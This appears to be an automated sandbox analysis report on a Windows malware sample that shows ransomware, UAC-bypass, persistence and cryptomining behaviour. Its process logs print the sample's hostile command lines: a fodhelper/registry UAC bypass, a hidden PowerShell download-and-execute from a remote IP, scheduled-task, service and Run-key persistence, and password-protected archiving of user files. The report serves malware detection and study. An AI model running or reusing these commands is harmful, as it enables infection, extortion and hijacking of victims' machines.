          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.7:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.7:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.7:49779 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.7:49780 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.182:443 -> 192.168.2.7:49783 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49784 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.7:49807 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.182:443 -> 192.168.2.7:49809 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49811 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49812 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.7:49814 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.182:443 -> 192.168.2.7:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.7:49816 version: TLS 1.2
          Source: jxatBamQnK.exe, 00000000.00000003.387554647.000000C0000AA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputData

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Modifies existing user documents (likely ransomware behavior)
          Source: C:\Windows\Temp\encrypt.exeFile moved: C:\Users\user\Desktop\LTKMYBSEYZ\LTKMYBSEYZ.docx
          Source: C:\Windows\Temp\encrypt.exeFile moved: C:\Users\user\Desktop\DVWHKMNFNN\NWTVCDUMOB.pdf
          Source: C:\Windows\Temp\encrypt.exeFile moved: C:\Users\user\Desktop\YPSIACHYXW.png
          Source: C:\Windows\Temp\encrypt.exeFile moved: C:\Users\user\Desktop\DVWHKMNFNN.docx
          Source: C:\Windows\Temp\encrypt.exeFile moved: C:\Users\user\Desktop\LTKMYBSEYZ\BPMLNOBVSB.png

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\daemon.exeJump to dropped file
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B252FC56_2_00007FF650B252FC
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B56CC056_2_00007FF650B56CC0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4021456_2_00007FF650B40214
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2214056_2_00007FF650B22140
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B3C30C56_2_00007FF650B3C30C
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B692C456_2_00007FF650B692C4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B522C456_2_00007FF650B522C4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B612C856_2_00007FF650B612C8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B662E056_2_00007FF650B662E0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4F2F056_2_00007FF650B4F2F0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4623856_2_00007FF650B46238
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4826456_2_00007FF650B48264
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B503E456_2_00007FF650B503E4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B7834456_2_00007FF650B78344
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B7034056_2_00007FF650B70340
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1836156_2_00007FF650B18361
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B514FC56_2_00007FF650B514FC
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5550C56_2_00007FF650B5550C
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4052856_2_00007FF650B40528
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1B4D856_2_00007FF650B1B4D8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B564F456_2_00007FF650B564F4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B3049456_2_00007FF650B30494
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1444856_2_00007FF650B14448
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1A46456_2_00007FF650B1A464
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B605A856_2_00007FF650B605A8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2853856_2_00007FF650B28538
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5971456_2_00007FF650B59714
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2268056_2_00007FF650B22680
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B3D69856_2_00007FF650B3D698
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2164856_2_00007FF650B21648
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2865856_2_00007FF650B28658
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B3C66856_2_00007FF650B3C668
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4A7C056_2_00007FF650B4A7C0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4F7F456_2_00007FF650B4F7F4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B6178456_2_00007FF650B61784
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B3F7A056_2_00007FF650B3F7A0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5A7B456_2_00007FF650B5A7B4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5576056_2_00007FF650B55760
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B3A90C56_2_00007FF650B3A90C
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5E91C56_2_00007FF650B5E91C
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B468BC56_2_00007FF650B468BC
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4D88056_2_00007FF650B4D880
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2089C56_2_00007FF650B2089C
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B188B056_2_00007FF650B188B0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B43A1856_2_00007FF650B43A18
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1CA2056_2_00007FF650B1CA20
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B54A2C56_2_00007FF650B54A2C
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B409C456_2_00007FF650B409C4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1AAF856_2_00007FF650B1AAF8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B17B2A56_2_00007FF650B17B2A
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B36AE856_2_00007FF650B36AE8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B14AF056_2_00007FF650B14AF0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B15A4456_2_00007FF650B15A44
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B66C1056_2_00007FF650B66C10
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B61C1856_2_00007FF650B61C18
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B3DBBC56_2_00007FF650B3DBBC
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B21BD456_2_00007FF650B21BD4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1DBF056_2_00007FF650B1DBF0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B57B9C56_2_00007FF650B57B9C
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B7AB6056_2_00007FF650B7AB60
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B28B7056_2_00007FF650B28B70
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B11C7B56_2_00007FF650B11C7B
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1EC9856_2_00007FF650B1EC98
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B40E0056_2_00007FF650B40E00
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B47D7856_2_00007FF650B47D78
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1CD8456_2_00007FF650B1CD84
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B28DA856_2_00007FF650B28DA8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B46D4C56_2_00007FF650B46D4C
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B60D5856_2_00007FF650B60D58
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B51D6456_2_00007FF650B51D64
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B39EF856_2_00007FF650B39EF8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B19EB856_2_00007FF650B19EB8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B54EC456_2_00007FF650B54EC4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B22E3856_2_00007FF650B22E38
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2100856_2_00007FF650B21008
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B7B03056_2_00007FF650B7B030
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4FFC856_2_00007FF650B4FFC8
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4AF8056_2_00007FF650B4AF80
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B61FAC56_2_00007FF650B61FAC
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B4BFB456_2_00007FF650B4BFB4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2D11056_2_00007FF650B2D110
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B3B12056_2_00007FF650B3B120
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B700C456_2_00007FF650B700C4
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B1F0D056_2_00007FF650B1F0D0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2E0E056_2_00007FF650B2E0E0
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B7E07856_2_00007FF650B7E078
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B740A456_2_00007FF650B740A4
          Source: miner.exe.35.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\reg.exe "reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: amsi64_6932.amsi.csv, type: OTHERMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: amsi64_4440.amsi.csv, type: OTHERMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000000.00000003.386967956.000000C000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000000.00000003.387736595.000000C000056000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000023.00000003.440719623.000000C00009E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000000.00000003.386987758.000000C000112000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000023.00000003.439742062.000000C00018A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000027.00000002.415175472.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000027.00000002.415175472.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
          Source: 0000002F.00000002.435462539.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 0000002F.00000002.435462539.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
          Source: 00000032.00000002.453501314.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000032.00000002.453501314.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
          Source: Process Memory Space: jxatBamQnK.exe PID: 6352, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: Process Memory Space: daemon.exe PID: 6220, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: Process Memory Space: daemon.exe PID: 6052, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: Process Memory Space: daemon.exe PID: 6052, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
          Source: Process Memory Space: daemon.exe PID: 7048, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: Process Memory Space: daemon.exe PID: 7048, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
          Source: Process Memory Space: daemon.exe PID: 4404, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: Process Memory Space: daemon.exe PID: 4404, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
          Source: Process Memory Space: scan.exe PID: 2828, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: C:\Users\user\Documents\20220813\PowerShell_transcript.179605.PThsxFDM.20220813090655.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: C:\Users\user\Documents\20220813\PowerShell_transcript.179605.7QwF43q_.20220813090656.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: C:\Windows\Temp\miner.exe, type: DROPPEDMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B5AEBC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,SetSuspendState,ExitWindowsEx,56_2_00007FF650B5AEBC
          Source: C:\Windows\Temp\rar.exeCode function: String function: 00007FF650B283F0 appears 40 times
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B33E74: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,56_2_00007FF650B33E74
          Source: rar.exe.38.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: C:\Users\user\Desktop\jxatBamQnK.exeFile created: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.batJump to behavior
          Source: classification engineClassification label: mal100.rans.expl.evad.mine.winEXE@168/32@0/100
          Source: C:\Windows\Temp\rar.exeFile read: C:\Users\desktop.ini
          Source: C:\Windows\Temp\rar.exeCode function: 56_2_00007FF650B2C9EC GetLastError,FormatMessageW,56_2_00007FF650B2C9EC
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.bat" "
          Source: jxatBamQnK.exeVirustotal: Detection: 61%
          Source: jxatBamQnK.exeReversingLabs: Detection: 57%
          Source: C:\Users\user\Desktop\jxatBamQnK.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\jxatBamQnK.exe "C:\Users\user\Desktop\jxatBamQnK.exe"
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\reg.exe "reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")"
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\sc.exe sc create msupdate binpath= C:\Windows\Temp\C:\Windows\Temp\daemon.exe
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\sc.exe sc description msupdate "Just For Test"
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\"http://212.87.212.218/doanlowd.txt\")
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\sc.exe sc config msupdate start= auto
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\net.exe net start msupdate
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f
          Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f
          Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.bat" "
          Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start msupdate
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f
          Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\daemon.exe C:\Windows\Temp\daemon.exe
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\System32\findstr.exe findstr encrypt.exe
          Source: C:\Windows\System32\findstr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\jxatBamQnK.exeProcess created: C:\Windows\Temp\encrypt.exe C:\Windows\Temp\encrypt.exe
          Source: unknownProcess created: C:\Windows\Temp\daemon.exe "C:\Windows\Temp\daemon.exe"
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\findstr.exe findstr encrypt.exe
          Source: C:\Windows\System32\findstr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\Temp\daemon.exe "C:\Windows\Temp\daemon.exe"
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process get executablepath
          Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\Temp\daemon.exe "C:\Windows\Temp\daemon.exe"
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\System32\findstr.exe findstr scan.exe
          Source: C:\Windows\Temp\encrypt.exeProcess created: C:\Windows\System32\cmd.exe cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
          Source: C:\Windows\System32\findstr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Temp\daemon.exeProcess created: C:\Windows\Temp\scan.exe C:\Windows\Temp\scan.exe
